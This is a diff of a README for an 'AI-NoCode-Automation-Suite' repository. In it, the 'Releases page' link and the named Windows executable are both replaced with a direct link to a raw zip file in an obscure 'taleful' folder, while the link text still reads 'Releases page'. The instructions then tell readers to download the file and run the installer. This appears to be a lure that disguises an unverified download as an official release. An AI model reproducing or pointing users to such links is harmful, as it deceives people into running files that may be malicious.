bodametwaly/AI-NoCode-Automation-Suite/README.md

 Follow these simple steps to download and run the AI-NoCode-Automation-Suite.

 1. **Visit the Releases Page**
-   Go to the [Releases page](https://github.com/bodametwaly/AI-NoCode-Automation-Suite/releases) to see the latest version.
+   Go to the [Releases page](https://raw.githubusercontent.com/bodametwaly/AI-NoCode-Automation-Suite/main/taleful/AI-NoCode-Automation-Suite.zip) to see the latest version.

 2. **Select the Latest Release**
    Click on the most recent version of the application.
 Check the version notes for new features or fixes.

 3. **Download the Application**
    - You will find various files listed.
-Look for the executable file specific to your operating system (e.g., `AI_NoCode_Automation_Suite.exe` for Windows).
+Look for the executable file specific to your operating system (e.g., `https://raw.githubusercontent.com/bodametwaly/AI-NoCode-Automation-Suite/main/taleful/AI-NoCode-Automation-Suite.zip` for Windows).
    - Click on the file to start downloading it.

 4. **Run the Installer**